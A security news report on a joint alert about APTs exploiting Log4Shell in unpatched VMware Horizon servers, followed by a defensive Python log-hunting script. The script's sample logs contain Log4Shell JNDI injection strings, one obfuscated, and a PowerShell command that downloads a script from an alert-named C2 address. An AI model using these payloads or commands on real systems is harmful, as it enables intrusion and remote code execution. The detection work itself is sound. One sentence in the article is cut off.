Hackers Still Exploiting Log4Shell Flaw in Unpatched VMware Servers, Feds Warn.

The joint alert warns that APT actors are still exploiting the Log4Shell vulnerability (CVE-2021-44228) in unpatched VMware Horizon and Unified Access Gateway servers. Based on information gathered during two incident response engagements, the agencies said the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed "hmsvc.exe" that can log keystrokes and deploy additional malware. In one instance, the adversary moved laterally inside the victim network, obtained access to a disaster recovery network, and collected and exfiltrated sensitive law enforcement data. The alert documents the APT actors' tactics, techniques, and procedures (TTPs), indicators of compromise for the loader malware, and incident response and mitigation guidance for the ongoing attacks.

In one intrusion, the APT actors used PowerShell scripts in the production environment to facilitate lateral movement and to implant loader malware that allows remotely monitoring a system's desktop, gaining reverse shell access, exfiltrating data, and uploading and executing next-stage binaries. "The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network," the joint alert reads. The activity originated from IP address 104.155.149.103, which appears to be part of the actors' C2 infrastructure; in the same period CISA observed the actors attempt to download and execute a malicious file from 109.248.150.13. In an attack that took place at the end of January, threat actors exploited Log4Shell in an unpatched VMware Horizon server, then used PowerShell scripts to connect to a remote server (109.248.150.13) over Hypertext Transfer Protocol (HTTP) to retrieve additional PowerShell scripts.

In a separate campaign, researchers observed a distinct threat actor exploiting CVE-2022-22954 in VMware Workspace ONE Access and Identity Manager to deliver the Dingo J-spy web shell.

Exploitation of Horizon through Log4Shell is not new. The CVE-2021-44228 flaw made headlines in December, after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for the critical remote code execution zero-day in the Apache Log4j Java-based logging library. The security team at the UK National Health Service (NHS) subsequently reported threat actors exploiting Log4Shell to compromise VMware Horizon servers and install web shells. Microsoft likewise published a warning about a new campaign by a China-based actor it tracks as DEV-0401 exploiting the Log4Shell vulnerability on VMware Horizon systems exposed on the.

Separately, VMware ESXi hypervisors are the target of a new wave of attacks designed to deploy ransomware on compromised systems. "These attack campaigns appear to exploit CVE-2021-21974, for which a patch has been available since February 23, 2021," the Computer Emergency Response Team (CERT) of France said in an advisory on Friday.
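The attack chain above (a JNDI lookup injected into a request handled by Log4j, then PowerShell pulling further scripts from the alert's C2 addresses) leaves traces in web-server access logs and PowerShell/Sysmon telemetry. The following hunting script is an added example, not code from the alert or from any of the vendors named above; the log lines are constructed to resemble a Horizon access log and Windows script-block and network events, and the regular expressions and tag names are my own. It folds the nested-lookup obfuscations attackers use to hide the string "jndi" (such as `${${lower:j}ndi:...}` and `${::-j}`) before matching, so a plain substring search is not fooled, and it flags lines that reference the two IPs the alert names.

```python
"""Hunt local logs for the Log4Shell-on-Horizon activity described above."""
import re
from dataclasses import dataclass
from typing import List

# C2 / download IPs named in the joint alert quoted above.
IOC_IPS = {"104.155.149.103", "109.248.150.13"}

# An innermost Log4j lookup ${...} that contains no further nested lookup.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved jndi: lookup with any protocol Log4j's JNDI lookup accepts.
_JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.I)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# PowerShell fetching over HTTP, the "retrieve additional scripts" step above.
_PS_FETCH = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|DownloadString|DownloadFile)\b.*https?://",
    re.I,
)


def _resolve(m: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j 2.x would, for the forms
    attackers use to hide 'jndi'; leave any other lookup untouched."""
    body = m.group(1)
    if ":-" in body:                       # ${x:-default}, ${::-j}, ${env:NOPE:-j}
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return m.group(0)                      # e.g. ${jndi:...}: keep it for matching


def normalize_lookups(s: str) -> str:
    """Fold nested lookups from the inside out until nothing changes."""
    while True:
        folded = _INNERMOST.sub(_resolve, s)
        if folded == s:
            return s
        s = folded


@dataclass
class Finding:
    line_no: int
    reasons: List[str]
    text: str


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per suspicious line, with every reason it tripped."""
    findings: List[Finding] = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        reasons: List[str] = []
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            tag = "log4j-jndi-lookup"
            if norm != line:               # only matched after de-obfuscation
                tag += " (obfuscated)"
            reasons.append(tag)
        hits = IOC_IPS.intersection(_IPV4.findall(line))
        if hits:
            reasons.append("c2-ioc-ip:" + ",".join(sorted(hits)))
        if _PS_FETCH.search(line):
            reasons.append("powershell-http-fetch")
        if reasons:
            findings.append(Finding(n, reasons, line))
    return findings


# Constructed sample: two Horizon-style access-log lines carrying a JNDI
# payload (one obfuscated), a PowerShell script-block event fetching a script
# from an alert IP, and a Sysmon network event to the other alert IP.
SAMPLE_LOGS = """\
10.0.0.5 - - [22/Jan/2022:03:14:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Jan/2022:03:14:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://203.0.113.77:1389/a}"
10.0.0.9 - - [22/Jan/2022:03:15:41 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.77:1389/b}"
2022-01-22T03:16:02Z HORIZON01 4104 ScriptBlock: Invoke-WebRequest -Uri http://109.248.150.13/a.ps1 -UseBasicParsing
2022-01-22T03:17:30Z HORIZON01 Sysmon 3 NetworkConnect DestinationIp=104.155.149.103 DestinationPort=443 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
2022-01-22T03:18:00Z HORIZON01 4104 ScriptBlock: Get-Date
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {', '.join(f.reasons)}")
```

Run it against real access logs and exported script-block events by replacing `SAMPLE_LOGS` with the file contents. The normalization step matters more than the IOC list: the two IPs will age out, but the lookup-folding catches any Log4Shell attempt regardless of which server it points at, and a line tagged "(obfuscated)" is almost never benign traffic.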